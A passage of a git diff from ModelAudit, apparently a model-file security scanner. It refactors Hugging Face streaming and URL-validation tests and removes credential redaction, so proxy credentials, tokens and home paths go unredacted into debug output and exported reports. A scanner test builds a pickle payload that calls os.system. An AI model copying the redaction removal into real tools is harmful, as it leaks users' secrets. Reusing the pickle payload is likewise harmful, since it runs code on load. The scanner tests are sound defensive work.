partial(_range_response_for_frame, frame) _mock_build_headers.side_effect = lambda *, token=None, headers=None: headers or {} mock_requests_get.side_effect = range_response @@ -12132,18 +11830,7 @@ def test_select_streamable_flax_excludes_large_text_owner_merges( mock_requests_get: MagicMock, ) -> None: """A complete large tokenizer text file must not be promoted to Flax.""" - payload = ("#version: 0.2\n" + "e n\n" * 600_000).encode("utf-8") - mock_requests_get.side_effect = _fake_range_responder(payload) - - selected_files = _select_streamable_hf_files( - "test/model", - ["known.msgpack", "merges.txt"], - _HF_TEST_REVISION, - scannable_extensions={".msgpack", ".flax", ".orbax", ".jax"}, - scannable_scanner_ids={"flax_msgpack"}, - ) - - assert selected_files.filenames == ["known.msgpack"] + _assert_large_text_owner_excluded_from_streaming(mock_requests_get, ("e n\n"), (600_000)) @patch("requests.get") def test_select_streamable_text_owner_prefix_preserves_embedded_flax_route( @@ -12267,18 +11954,7 @@ def test_select_streamable_flax_excludes_non_ascii_bpe_text_owner( mock_requests_get: MagicMock, ) -> None: """Printable non-ASCII tokenizer text must not be selected as inconclusive Flax.""" - payload = ("#version: 0.2\n" + "Ġ hello\n" * 300_000).encode("utf-8") - mock_requests_get.side_effect = _fake_range_responder(payload) - - selected_files = _select_streamable_hf_files( - "test/model", - ["known.msgpack", "merges.txt"], - _HF_TEST_REVISION, - scannable_extensions={".msgpack", ".flax", ".orbax", ".jax"}, - scannable_scanner_ids={"flax_msgpack"}, - ) - - assert selected_files.filenames == ["known.msgpack"] + _assert_large_text_owner_excluded_from_streaming(mock_requests_get, ("Ġ hello\n"), (300_000)) @patch("requests.get") def test_select_streamable_protobuf_excludes_ascii_varint_text_near_match( @@ -12456,10 +12132,7 @@ def test_download_model_streaming_listing_timeout_fails_closed( _mock_list_repo_files: MagicMock, ) -> None: """Streaming mode should fail closed when repo listing times out.""" - with pytest.raises(Exception, match="Timeout listing files in repository test/model"): - list(download_model_streaming("https://huggingface.co/test/model")) - - mock_hf_hub_download.assert_not_called() + _assert_streaming_listing_without_models(mock_hf_hub_download, "Timeout listing files in repository test/model") @patch( "modelaudit.utils.sources.huggingface._list_repo_files_with_timeout", @@ -12472,13 +12145,9 @@ def test_download_model_streaming_listing_error_fails_closed( _mock_list_repo_files: MagicMock, ) -> None: """Streaming mode should fail closed when repo listing errors out.""" - with pytest.raises( - Exception, - match="Failed listing files in repository test/model: repository listing unavailable", - ): - list(download_model_streaming("https://huggingface.co/test/model")) - - mock_hf_hub_download.assert_not_called() + _assert_streaming_listing_without_models( + mock_hf_hub_download, "Failed listing files in repository test/model: repository listing unavailable" + ) @patch("modelaudit.utils.sources.huggingface._detect_huggingface_content_route_format", return_value=None) @patch("modelaudit.utils.sources.huggingface._get_model_extensions", return_value={".bin"}) @@ -12495,14 +12164,7 @@ def test_download_model_streaming_listing_success_without_scannable_files_fails_ _mock_detect_content: MagicMock, ) -> None: """Streaming mode must not download every repo file when no scannable files are listed.""" - with pytest.raises( - Exception, - match="Refusing to download full snapshot for test/model: " - "repository listing contains no recognized ModelAudit-scannable files", - ): - list(download_model_streaming("https://huggingface.co/test/model")) - - mock_hf_hub_download.assert_not_called() + _assert_streaming_listing_without_models(mock_hf_hub_download) @patch("modelaudit.utils.sources.huggingface._get_model_extensions", return_value={".bin"}) @patch( @@ -12517,14 +12179,7 @@ def test_download_model_streaming_empty_listing_fails_closed( _mock_get_extensions: MagicMock, ) -> None: """An empty successful listing should not make streaming mode download all repo files.""" - with pytest.raises( - Exception, - match="Refusing to download full snapshot for test/model: " - "repository listing contains no recognized ModelAudit-scannable files", - ): - list(download_model_streaming("https://huggingface.co/test/model")) - - mock_hf_hub_download.assert_not_called() + _assert_streaming_listing_without_models(mock_hf_hub_download) @patch( "modelaudit.utils.sources.huggingface._list_repo_files_with_timeout", @@ -13457,10 +13112,7 @@ def test_parse_invalid_file_urls(self) -> None: ) def test_parse_file_url_rejects_unsafe_repo_components(self, url: str) -> None: """Direct file URLs should validate repo-id components before download.""" - with pytest.raises(ValueError): - parse_huggingface_file_url(url) - - assert is_huggingface_file_url(url) is False + _assert_invalid_hf_file_url(url) @pytest.mark.parametrize( "url", @@ -13482,10 +13134,7 @@ def test_parse_file_url_rejects_unsafe_repo_components(self, url: str) -> None: ) def test_parse_file_url_rejects_unsafe_revision_or_filename_components(self, url: str) -> None: """Direct file URLs must not smuggle traversal or separators into SDK paths.""" - with pytest.raises(ValueError): - parse_huggingface_file_url(url) - - assert is_huggingface_file_url(url) is False + _assert_invalid_hf_file_url(url) @pytest.mark.parametrize( "url", @@ -13514,10 +13163,7 @@ def test_parse_file_url_rejects_unsafe_revision_or_filename_components(self, url ) def test_parse_file_url_rejects_ambiguous_or_sdk_invalid_components(self, url: str) -> None: """Validation should reject lossy decoding and repo IDs the SDK cannot accept.""" - with pytest.raises(ValueError): - parse_huggingface_file_url(url) - - assert is_huggingface_file_url(url) is False + _assert_invalid_hf_file_url(url) @pytest.mark.parametrize( "filename", @@ -14151,12 +13797,148 @@ def test_download_file_missing_dependency(self): """Test error when huggingface-hub is not installed.""" real_import = __import__ with patch("builtins.__import__") as mock_import: - - def side_effect(name, *args, **kwargs): - if name == "huggingface_hub": - raise ImportError("No module named 'huggingface_hub'") - return real_import(name, *args, **kwargs) - - mock_import.side_effect = side_effect + mock_import.side_effect = _missing_hf_import(real_import) with pytest.raises(ImportError, match="huggingface-hub package is required"): download_file_from_hf("https://huggingface.co/test/model/resolve/main/file.bin") + + +def _range_response_for_frame( + frame: bytes, /, url: str, *, headers: dict[str, str], **_kwargs: object +) -> _FakeRangeResponse: + start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) + start, end = int(start_text), min(int(end_text), len(frame) - 1) + return _strict_range_response( + frame[start : end + 1], + len(frame), + start_offset=start, + url=url, + ) + + +def _tracked_safetensors_stream(streamed_items: list[Any], /) -> Iterator[Any]: + for item in download_model_streaming( + f"hf://test/model?revision={_HF_TEST_REVISION}", + max_size=4096, + scannable_scanner_ids={"safetensors"}, + _include_scan_results=True, + ): + streamed_items.append(item) + yield item + + +def _download_openvino_fixture(tmp_path: Path, xml_suffix: str, /, *, filename: str, **_kwargs: object) -> str: + path = tmp_path / "huggingface" / "test" / "model" / filename + path.parent.mkdir(parents=True, exist_ok=True) + if filename.endswith(xml_suffix): + path.write_text("", encoding="utf-8") + else: + path.write_bytes(b"weights") + return str(path) + + +def _content_routed_probe_response(url: str, **_kwargs: object) -> _FakeRangeResponse: + if url.endswith("/evil.payload"): + return _FakeRangeResponse(b"\x08\x00\x00\x00TFL3" + b"\x00" * 16) + return _FakeRangeResponse(valid_png_bytes()) + + +def _index_range_response( + index_name: str, shard_name: str, payloads: dict[str, bytes] +) -> Callable[..., _FakeRangeResponse]: + def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: + filename = index_name if index_name in url else shard_name + payload = payloads[filename] + return _range_response_for_frame(payload, url, headers=headers) + + return range_response + + +def _missing_hf_import(real_import: Callable[..., Any]) -> Callable[..., Any]: + def side_effect(name: str, *args: Any, **kwargs: Any) -> Any: + if name == "huggingface_hub": + raise ImportError("No module named 'huggingface_hub'") + return real_import(name, *args, **kwargs) + + return side_effect + + +def _assert_streaming_listing_without_models( + mock_hf_hub_download: MagicMock, + error_message: str = ( + "Refusing to download full snapshot for test/model: " + "repository listing contains no recognized ModelAudit-scannable files" + ), +) -> None: + with pytest.raises(Exception, match=error_message): + list(download_model_streaming("https://huggingface.co/test/model")) + mock_hf_hub_download.assert_not_called() + + +def _assert_invalid_hf_file_url(url: str) -> None: + with pytest.raises(ValueError): + parse_huggingface_file_url(url) + + assert is_huggingface_file_url(url) is False + + +def _assert_unsupported_hf_tree_item( + mock_repo_info: MagicMock, mock_get_session: MagicMock, tree_item: dict[str, object], case_error_message: str +) -> None: + mock_repo_info.return_value = SimpleNamespace(sha=_HF_TEST_REVISION) + mock_get_session.return_value.stream.return_value = _FakeTreeResponse( + [ + {"type": "file", "path": "benign.bin"}, + tree_item, + ] + ) + + repo_files, revision, error = _list_repo_files_with_timeout("test/model", timeout_seconds=7) + + assert repo_files is None + assert revision is None + assert error is not None + assert case_error_message in error + + +def _assert_large_text_owner_excluded_from_streaming( + mock_requests_get: MagicMock, case_merge_line: str, case_line_count: int +) -> None: + payload = ("#version: 0.2\n" + case_merge_line * case_line_count).encode("utf-8") + mock_requests_get.side_effect = _fake_range_responder(payload) + + selected_files = _select_streamable_hf_files( + "test/model", + ["known.msgpack", "merges.txt"], + _HF_TEST_REVISION, + scannable_extensions={".msgpack", ".flax", ".orbax", ".jax"}, + scannable_scanner_ids={"flax_msgpack"}, + ) + + assert selected_files.filenames == ["known.msgpack"] + + +def _assert_streamed_pickle_control( + mock_hf_hub_download: MagicMock, mock_requests_get: MagicMock, tmp_path: Path, case_filename: str +) -> None: + policy = resolve_scanner_selection_policy(scanners=["pickle"]) + malicious_pickle = b"cos\nsystem\n(S'echo pwn'\ntR." + mock_requests_get.return_value = _FakeRangeResponse(malicious_pickle) + + mock_hf_hub_download.side_effect = partial(download_payload_fixture, tmp_path, malicious_pickle) + + results = list( + download_model_streaming( + "https://huggingface.co/test/model", + scannable_extensions=selected_scanner_extensions(policy, conservative=True), + scannable_filenames=selected_scanner_filenames(policy, conservative=True), + scannable_scanner_ids=policy.enabled_scanner_ids, + ) + ) + + assert results == [(tmp_path / case_filename, True)] + assert mock_requests_get.call_count == 1 + mock_hf_hub_download.assert_called_once_with( + repo_id="test/model", + filename=case_filename, + revision=_HF_TEST_REVISION, + ) diff --git a/tests/utils/test_result_conversion.py b/tests/utils/test_result_conversion.py index 7b9f1d9c3..6799c7fde 100644 --- a/tests/utils/test_result_conversion.py +++ b/tests/utils/test_result_conversion.py @@ -181,15 +181,7 @@ def test_missing_issue_severity_defaults_to_info(self) -> None: def test_check_status_normalization_ok(self) -> None: """Test 'ok' is normalized to 'passed'.""" - result_dict = { - "scanner": "test", - "issues": [], - "checks": [{"name": "test", "status": "ok", "message": "", "timestamp": FIXED_TIMESTAMP}], - } - - result = scan_result_from_dict(result_dict) - - assert result.checks[0].status == CheckStatus.PASSED + _assert_normalized_passed_check_status("ok") def test_check_status_normalization_fail(self) -> None: """Test 'fail' is normalized to 'failed'.""" @@ -205,15 +197,7 @@ def test_check_status_normalization_fail(self) -> None: def test_check_status_normalization_invalid(self) -> None: """Test invalid status defaults to PASSED.""" - result_dict = { - "scanner": "test", - "issues": [], - "checks": [{"name": "test", "status": "invalid", "message": "", "timestamp": FIXED_TIMESTAMP}], - } - - result = scan_result_from_dict(result_dict) - - assert result.checks[0].status == CheckStatus.PASSED + _assert_normalized_passed_check_status("invalid") def test_end_time_from_duration(self) -> None: """Test end_time is calculated from duration.""" @@ -346,3 +330,15 @@ def test_roundtrip_preserves_rule_codes(self) -> None: assert restored.issues[0].rule_code == "S201" assert restored.checks[0].rule_code == "S201" + + +def _assert_normalized_passed_check_status(case_status: str) -> None: + result_dict = { + "scanner": "test", + "issues": [], + "checks": [{"name": "test", "status": case_status, "message": "", "timestamp": FIXED_TIMESTAMP}], + } + + result = scan_result_from_dict(result_dict) + + assert result.checks[0].status == CheckStatus.PASSED From 551bf71677a06b43670d7dcad57b89655e4a24e9 Mon Sep 17 00:00:00 2001 From: Michael D'Angelo Date: Sat, 3 Oct 2026 01:19:21 +0000 Subject: [PATCH 03/24] feat: preserve raw evidence in scan output and diagnostics --- CHANGELOG.md | 4 + README.md | 2 + modelaudit/cli.py | 223 +- modelaudit/core.py | 105 +- modelaudit/detectors/jit_script.py | 15 +- modelaudit/detectors/secrets.py | 9 +- modelaudit/integrations/jfrog.py | 3 +- modelaudit/integrations/mlflow.py | 230 +- modelaudit/integrations/sarif_formatter.py | 85 +- modelaudit/integrations/sbom_generator.py | 121 +- modelaudit/integrations/source_redaction.py | 1100 ----- .../integrations/source_serialization.py | 67 + .../scanners/_catboost_evidence_redaction.py | 4221 ---------------- modelaudit/scanners/catboost_scanner.py | 292 +- modelaudit/scanners/text_scanner.py | 3 +- modelaudit/utils/file/streaming.py | 3 +- modelaudit/utils/helpers/evidence.py | 61 + modelaudit/utils/helpers/retry.py | 7 +- modelaudit/utils/sources/cloud_storage.py | 514 +- modelaudit/utils/sources/huggingface.py | 38 +- modelaudit/utils/sources/huggingface_paths.py | 85 +- modelaudit/utils/sources/jfrog.py | 158 +- modelaudit/utils/sources/pytorch_hub.py | 46 +- tests/conftest.py | 4 +- tests/detectors/test_jit_script_detector.py | 19 +- tests/detectors/test_secrets_detector.py | 158 +- tests/integrations/test_jfrog.py | 41 +- tests/integrations/test_jfrog_integration.py | 14 +- tests/integrations/test_mlflow_integration.py | 220 +- tests/integrations/test_sarif_formatter.py | 307 +- tests/integrations/test_sarif_redaction.py | 979 ---- tests/integrations/test_sbom_url_fixes.py | 404 +- .../test_catboost_evidence_redaction.py | 4266 ----------------- tests/scanners/test_catboost_scanner.py | 1765 +------ tests/scanners/test_metadata_scanner.py | 30 +- tests/scanners/test_text_scanner.py | 92 +- tests/test_cli.py | 266 +- tests/test_debug_command.py | 74 +- tests/test_streaming_scan.py | 233 +- tests/utils/file/test_streaming_analysis.py | 24 + tests/utils/helpers/test_evidence.py | 71 + tests/utils/helpers/test_retry.py | 19 + tests/utils/sources/test_cloud_storage.py | 513 +- tests/utils/sources/test_huggingface.py | 68 +- tests/utils/sources/test_pytorch_hub.py | 7 +- 45 files changed, 1459 insertions(+), 15507 deletions(-) delete mode 100644 modelaudit/integrations/source_redaction.py create mode 100644 modelaudit/integrations/source_serialization.py delete mode 100644 modelaudit/scanners/_catboost_evidence_redaction.py create mode 100644 modelaudit/utils/helpers/evidence.py delete mode 100644 tests/integrations/test_sarif_redaction.py delete mode 100644 tests/scanners/test_catboost_evidence_redaction.py create mode 100644 tests/utils/helpers/test_evidence.py create mode 100644 tests/utils/helpers/test_retry.py diff --git a/CHANGELOG.md b/CHANGELOG.md index 33027145b..40e5dd819 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +### Changed + +- Include original credential values and configured debug paths in scan evidence, diagnostics, and exported reports while retaining detections and output bounds. + ### Security - Upgrade gzip, PCRE2, SQLite, and Perl in Docker runtime images to pick up Debian security fixes. diff --git a/README.md b/README.md index 4241c3c0c..f1ea52703 100644 --- a/README.md +++ b/README.md @@ -50,6 +50,8 @@ Files scanned: 1 | Issues found: 2 critical, 1 warning Why: Could execute code when the model loads ``` +Scan evidence and source errors can include original credential values, including in JSON, SARIF, SBOM, and shared reports. Credential normalization remains where it affects detection, grouping, or suppression. + ## What It Detects - **Code execution attacks** in Pickle, PyTorch, NumPy, and Joblib files diff --git a/modelaudit/cli.py b/modelaudit/cli.py index 463985c45..891b63adf 100644 --- a/modelaudit/cli.py +++ b/modelaudit/cli.py @@ -17,6 +17,7 @@ from dataclasses import dataclass, field from pathlib import Path, PureWindowsPath from typing import Any, NoReturn, cast +from urllib.parse import urlparse, urlunparse import click from pydantic import TypeAdapter @@ -57,7 +58,7 @@ ) from .integrations.jfrog import scan_jfrog_artifact from .integrations.sarif_formatter import format_sarif_output -from .integrations.source_redaction import redact_source_value +from .integrations.source_serialization import serialize_source_value from .models import FileMetadataModel, ModelAuditResultModel from .rules import Rule, RuleRegistry, Severity from .scanner_results import ( @@ -105,11 +106,6 @@ download_from_cloud, is_cleartext_cloud_url, is_cloud_url, - is_stream_url, - redact_cloud_error_for_display, - redact_stream_error_for_display, - redact_stream_url_for_display, - redact_url_for_display, ) from .utils.sources.huggingface import ( download_file_from_hf, @@ -120,14 +116,9 @@ is_huggingface_url, parse_huggingface_file_url, parse_huggingface_url_with_revision, - redact_huggingface_url_for_display, - redact_huggingface_urls_in_text, ) from .utils.sources.jfrog import ( is_jfrog_url, - is_jfrog_url_like, - redact_jfrog_error_for_display, - redact_jfrog_url_for_display, ) from .utils.sources.pytorch_hub import ( download_pytorch_hub_model, @@ -141,51 +132,23 @@ def _display_path(path: str) -> str: """Return a path safe for user-facing CLI output.""" - return _escape_terminal_text(_display_scan_path(path)) + return _escape_terminal_text(_report_source_path(path)) -def _display_scan_path(path: str) -> str: - """Return an exact local path or a credential-redacted remote identifier.""" +def _report_source_path(path: str) -> str: if path.startswith("models:/"): - from .integrations.mlflow import _redact_mlflow_error_for_display + from .integrations.mlflow import _format_mlflow_error - return _redact_mlflow_error_for_display(path) - if is_stream_url(path): - return f"stream://{redact_stream_url_for_display(path[9:])}" - if ( - is_cloud_url(path) - or is_cleartext_cloud_url(path) - or is_pytorch_hub_url(path) - or is_cleartext_pytorch_hub_url(path) - ): - return redact_url_for_display(path) - if is_jfrog_url_like(path): - return redact_jfrog_url_for_display(path) - return redact_huggingface_url_for_display(path) + return _format_mlflow_error(path) + return path def _display_error(error: object, path: str) -> str: - """Return an error safe for user-facing CLI output.""" - if is_stream_url(path): - display_error = redact_stream_error_for_display(error, path[9:]) - elif is_huggingface_url(path) or is_huggingface_file_url(path): - display_error = redact_huggingface_urls_in_text(str(error)) - elif is_jfrog_url_like(path): - display_error = redact_jfrog_error_for_display(error, path) - elif is_mlflow_uri(path): - from .integrations.mlflow import _redact_mlflow_error_for_display - - display_error = _redact_mlflow_error_for_display(error) - else: - display_error = ( - redact_cloud_error_for_display(error, path) - if is_cloud_url(path) - or is_cleartext_cloud_url(path) - or is_pytorch_hub_url(path) - or is_cleartext_pytorch_hub_url(path) - else str(error) - ) - return _escape_terminal_text(display_error) + if is_mlflow_uri(path): + from .integrations.mlflow import _format_mlflow_error + + return _escape_terminal_text(_format_mlflow_error(error)) + return _escape_terminal_text(str(error)) def _preview_size_text(size_bytes: object) -> str: @@ -227,7 +190,7 @@ def _build_huggingface_dry_run_preview( "dry_run": True, "source": "huggingface", "source_kind": source_kind, - "target": _display_scan_path(path), + "target": path, "mode": "streaming" if runtime.scan_and_delete else "standard", "artifact_downloads": 0, "scanner_execution": False, @@ -362,7 +325,7 @@ def _build_huggingface_model_dry_run_preview(path: str, runtime: "_ScanRuntimeCo runtime, source_kind="model", metadata={ - "model_id": model_info.get("model_id") or model_info.get("repo_id") or _display_scan_path(path), + "model_id": model_info.get("model_id") or model_info.get("repo_id") or path, "file_count": model_info.get("file_count", 0), "total_size_bytes": total_size if isinstance(total_size, int) and not isinstance(total_size, bool) @@ -471,11 +434,9 @@ def _build_huggingface_file_dry_run_preview(path: str, runtime: "_ScanRuntimeCon resolved_revision = file_metadata.get("resolved_revision") checked_revision = resolved_revision if isinstance(resolved_revision, str) else revision if not _is_huggingface_commit_sha(checked_revision): - raise ValueError( - f"Unable to determine immutable revision for {_display_scan_path(path)}; refusing capped download" - ) + raise ValueError(f"Unable to determine immutable revision for {path}; refusing capped download") if not isinstance(size_bytes, int) or isinstance(size_bytes, bool) or size_bytes < 0: - raise ValueError(f"Unable to determine file size for {_display_scan_path(path)}; refusing capped download") + raise ValueError(f"Unable to determine file size for {path}; refusing capped download") if size_bytes > size_limit: raise ValueError( f"File size ({_format_size(size_bytes)}) exceeds maximum allowed size ({_format_size(size_limit)})" @@ -1769,18 +1730,18 @@ def track_streaming_paths_for_sbom( added_path = False for asset in streaming_result.assets: if asset.path: - self.scanned_paths.append(_display_scan_path(asset.path)) + self.scanned_paths.append(_report_source_path(asset.path)) added_path = True if not added_path and fallback_path is not None and not os.path.exists(fallback_path): - self.scanned_paths.append(_display_scan_path(fallback_path)) + self.scanned_paths.append(_report_source_path(fallback_path)) def track_directory_paths_for_sbom(self, scan_result: ModelAuditResultModel) -> None: """Track completed directory scan assets, including an authoritative empty set.""" self.sbom_paths_resolved = True for asset in scan_result.assets: if asset.path: - self.scanned_paths.append(_display_scan_path(asset.path)) + self.scanned_paths.append(_report_source_path(asset.path)) def defer_temp_cleanup(self, temp_path: str | None, *, cache_enabled: bool, verbose: bool) -> None: """Track temporary artifacts for post-SBOM cleanup.""" @@ -2036,6 +1997,60 @@ def _huggingface_requested_revision(path: str) -> str | None: return None +# Classification historically consumed normalized transport errors. Keep that +# input independent of raw report evidence so token text cannot imply auth failure. +_HF_CLASSIFICATION_URL_PATTERN = re.compile( + r"(?i)\b(?:https?://(?:[^\s\"'<>/@]+(?::[^\s\"'<>/@]*)?@)?(?:huggingface\.co|hf\.co)|hf://)" + r"[^\s\"'<>]*" +) + +_HF_CLASSIFICATION_QUERY_PATTERN = re.compile( + ( + r"([?&][^=\s&]*(?:signature|credential|security-token|access-key|access_key|token|" + r"secret|api-key|api_key|apikey|sig|sas)[^=\s&]*=)[^\s&#]+" + ), + re.IGNORECASE, +) + +_HF_CLASSIFICATION_USERINFO_PATTERN = re.compile(r"([a-z][a-z0-9+.-]*://)([^/@\s]+)@", re.IGNORECASE) + + +def _huggingface_classification_url(url: str) -> str: + """Normalize transport URL content for acquisition error classification.""" + try: + parsed = urlparse(url) + except ValueError: + redacted = _HF_CLASSIFICATION_USERINFO_PATTERN.sub(r"\1@", url) + if "://" in redacted: + scheme, remainder = redacted.split("://", 1) + _, separator, path = remainder.partition("/") + redacted = f"{scheme}://" + if separator: + redacted = f"{redacted}/{path}" + return redacted.split("#", 1)[0].split("?", 1)[0] + if not parsed.netloc: + if parsed.scheme in {"ftp", "hf", "http", "https"}: + redacted = _HF_CLASSIFICATION_USERINFO_PATTERN.sub(r"\1@", url) + return redacted.split("#", 1)[0].split("?", 1)[0] + return url + + netloc = parsed.netloc + if "@" in netloc: + netloc = netloc.rsplit("@", 1)[1] + + return urlunparse((parsed.scheme, netloc, parsed.path, "", "", "")) + + +def _huggingface_classification_error(text: str) -> str: + """Keep credential text from changing acquisition error categories.""" + redacted = _HF_CLASSIFICATION_URL_PATTERN.sub( + lambda match: _huggingface_classification_url(match.group(0)), + text, + ) + redacted = _HF_CLASSIFICATION_USERINFO_PATTERN.sub(r"\1@", redacted) + return _HF_CLASSIFICATION_QUERY_PATTERN.sub(r"\1", redacted) + + def _classify_huggingface_acquisition_error(error_msg: str) -> tuple[str, bool, str]: normalized = error_msg.lower() if any(marker in normalized for marker in _HF_AUTH_BLOCKED_MARKERS): @@ -2044,7 +2059,7 @@ def _classify_huggingface_acquisition_error(error_msg: str) -> tuple[str, bool, def _huggingface_acquisition_source_key(path: str, requested_revision: str | None) -> str: - display_path = _display_scan_path(path) + display_path = path if requested_revision and not is_huggingface_file_url(path): return f"{display_path}@{requested_revision}" return display_path @@ -2056,12 +2071,18 @@ def _record_huggingface_acquisition_error( *, path: str, error_msg: str, + classification_error: object | None = None, scanned_artifact_count: int = 0, ) -> None: """Record a Hugging Face source failure while preserving completed scan evidence.""" requested_revision = _huggingface_requested_revision(path) source_key = _huggingface_acquisition_source_key(path, requested_revision) - reason, blocked, category = _classify_huggingface_acquisition_error(error_msg) + classification_message = ( + _escape_terminal_text(_huggingface_classification_error(str(classification_error))) + if classification_error is not None + else error_msg + ) + reason, blocked, category = _classify_huggingface_acquisition_error(classification_message) if scanned_artifact_count: artifact_label = "artifact was" if scanned_artifact_count == 1 else "artifacts were" issue_message = ( @@ -2834,14 +2855,14 @@ def _write_scan_sbom( dict.fromkeys(asset.path for asset in audit_result.assets if asset.path and asset.type != "skipped") ) if asset_paths and (scan_and_delete or not path_state.sbom_paths_resolved): - paths_for_sbom = [_display_scan_path(path) for path in asset_paths] + paths_for_sbom = [_report_source_path(path) for path in asset_paths] elif path_state.sbom_paths_resolved: paths_for_sbom = path_state.scanned_paths else: paths_for_sbom = ( path_state.scanned_paths if path_state.scanned_paths - else [_display_scan_path(path) for path in expanded_paths] + else [_report_source_path(path) for path in expanded_paths] ) sbom_text = generate_sbom_pydantic(paths_for_sbom, audit_result) @@ -2860,14 +2881,14 @@ def _format_scan_output( if not verbose: audit_result.issues = [issue for issue in audit_result.issues if issue.severity != IssueSeverity.DEBUG] audit_result.checks = [check for check in audit_result.checks if check.severity != IssueSeverity.DEBUG] - redacted_result = redact_source_value(audit_result.model_dump(mode="python", exclude_none=True)) - return json.dumps(_JSON_VALUE_ADAPTER.dump_python(redacted_result, mode="json"), indent=2) + serialized_result = serialize_source_value(audit_result.model_dump(mode="python", exclude_none=True)) + return json.dumps(_JSON_VALUE_ADAPTER.dump_python(serialized_result, mode="json"), indent=2) if output_format == "sarif": return format_sarif_output(audit_result, expanded_paths, verbose) - redacted_result = redact_source_value(audit_result.model_dump(mode="python")) - output_text = format_text_output(redacted_result if isinstance(redacted_result, dict) else {}, verbose) + serialized_result = serialize_source_value(audit_result.model_dump(mode="python")) + output_text = format_text_output(serialized_result if isinstance(serialized_result, dict) else {}, verbose) previews = getattr(audit_result, "previews", None) if isinstance(previews, list) and previews: preview_text = _format_huggingface_dry_run_previews(previews, "text") @@ -3233,7 +3254,7 @@ def _scan_local_or_downloaded_path( elif os.path.isdir(actual_path): path_state.track_directory_paths_for_sbom(scan_results) else: - path_state.scanned_paths.append(_display_scan_path(actual_path)) + path_state.scanned_paths.append(_report_source_path(actual_path)) visible_issues = [ issue for issue in list(scan_results.issues) if verbose or issue.severity != IssueSeverity.DEBUG @@ -3295,7 +3316,7 @@ def _scan_local_or_downloaded_path( logger.error(f"Error during scan of {display_path}: {display_error}") click.echo(f"Error scanning {display_path}: {display_error}", err=True) path_state.mark_non_shard_error(audit_result) - path_state.scanned_paths.append(_display_scan_path(actual_path)) + path_state.scanned_paths.append(_report_source_path(actual_path)) if progress_tracker: progress_tracker.report_error(Exception(display_error)) @@ -3336,7 +3357,8 @@ def _resolve_scan_source_for_path( source_model_source=source_model_source, ) except Exception as exc: - error_msg = _display_error(exc, path) + raw_error = str(exc) + error_msg = _display_error(raw_error, path) logger.error(f"Failed to preview Hugging Face file {display_path}: {error_msg}") click.echo(f"Error previewing file from {display_path}: {error_msg}", err=True) _record_huggingface_acquisition_error( @@ -3344,6 +3366,7 @@ def _resolve_scan_source_for_path( path_state, path=path, error_msg=error_msg, + classification_error=raw_error, ) return None @@ -3401,7 +3424,8 @@ def _resolve_scan_source_for_path( elif runtime.show_styled_output: click.echo(style_text("❌ Download failed", fg="red", bold=True)) - error_msg = _display_error(exc, path) + raw_error = str(exc) + error_msg = _display_error(raw_error, path) logger.error(f"Failed to download file from {display_path}: {error_msg}") click.echo(f"Error downloading file from {display_path}: {error_msg}", err=True) _record_huggingface_acquisition_error( @@ -3409,6 +3433,7 @@ def _resolve_scan_source_for_path( path_state, path=path, error_msg=error_msg, + classification_error=raw_error, ) path_state.defer_temp_cleanup( temp_dir, @@ -3431,7 +3456,8 @@ def _resolve_scan_source_for_path( source_model_source=source_model_source, ) except Exception as exc: - error_msg = _display_error(exc, path) + raw_error = str(exc) + error_msg = _display_error(raw_error, path) logger.error(f"Failed to preview Hugging Face model {display_path}: {error_msg}") click.echo(f"Error previewing model from {display_path}: {error_msg}", err=True) _record_huggingface_acquisition_error( @@ -3439,6 +3465,7 @@ def _resolve_scan_source_for_path( path_state, path=path, error_msg=error_msg, + classification_error=raw_error, ) return None @@ -3674,7 +3701,8 @@ def _resolve_scan_source_for_path( if runtime.show_styled_output: click.echo(style_text("❌ Download/scan failed", fg="red", bold=True)) - error_msg = _display_error(exc, path) + raw_error = str(exc) + error_msg = _display_error(raw_error, path) if "insufficient disk space" in error_msg.lower(): logger.error(f"Disk space error for {display_path}: {error_msg}") click.echo(style_text(f"\n⚠️ {error_msg}", fg="yellow"), err=True) @@ -3695,6 +3723,7 @@ def _resolve_scan_source_for_path( path_state, path=path, error_msg=error_msg, + classification_error=raw_error, scanned_artifact_count=( streaming_result.files_scanned if streaming_result_aggregated and streaming_result is not None @@ -4844,7 +4873,7 @@ def scan_command( display_error = _display_error(exc, path) logger.error(f"Unexpected error processing {display_path}: {display_error}") click.echo(f"Unexpected error processing {display_path}: {display_error}", err=True) - path_state.scanned_paths.append(_display_scan_path(source_result.actual_path)) + path_state.scanned_paths.append(_report_source_path(source_result.actual_path)) path_state.mark_non_shard_error(audit_result) if progress_tracker: @@ -5919,31 +5948,6 @@ def _get_install_info() -> dict[str, Any]: return info -def _redact_proxy_url(proxy_url: str | None) -> str | None: - """Redact credentials from proxy URLs while preserving host/port for debugging. - - Proxy URLs often contain credentials (http://user:pass@host:port). - Since debug output is meant to be pasted in bug reports, we must redact - the credentials while keeping the scheme/host/port for troubleshooting. - """ - if not proxy_url: - return None - try: - from urllib.parse import urlsplit, urlunsplit - - parts = urlsplit(proxy_url) - if parts.username or parts.password: - # Rebuild URL without credentials - netloc = parts.hostname or "" - if parts.port: - netloc += f":{parts.port}" - return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment)) - except Exception: - # If parsing fails, return a safe indicator rather than the raw URL - return "" - return proxy_url - - def _get_env_info() -> dict[str, Any]: """Get environment variable information for debug output.""" from .telemetry import is_telemetry_enabled @@ -5954,8 +5958,8 @@ def _get_env_info() -> dict[str, Any]: "ciEnvironment": bool(os.getenv("CI")), "jfrogConfigured": bool(os.getenv("JFROG_API_TOKEN") or os.getenv("JFROG_ACCESS_TOKEN")), "mlflowConfigured": bool(os.getenv("MLFLOW_TRACKING_URI")), - "httpProxy": _redact_proxy_url(os.getenv("HTTP_PROXY") or os.getenv("http_proxy")), - "httpsProxy": _redact_proxy_url(os.getenv("HTTPS_PROXY") or os.getenv("https_proxy")), + "httpProxy": os.getenv("HTTP_PROXY") or os.getenv("http_proxy"), + "httpsProxy": os.getenv("HTTPS_PROXY") or os.getenv("https_proxy"), "noProxy": os.getenv("NO_PROXY") or os.getenv("no_proxy") or None, } @@ -6063,16 +6067,6 @@ def _get_scanner_info(verbose: bool = False) -> dict[str, Any]: return info -def _sanitize_debug_path(path: str) -> str: - """Sanitize filesystem paths for debug output.""" - home = str(Path.home()) - if path.startswith(home): - return "~" + path[len(home) :] - if 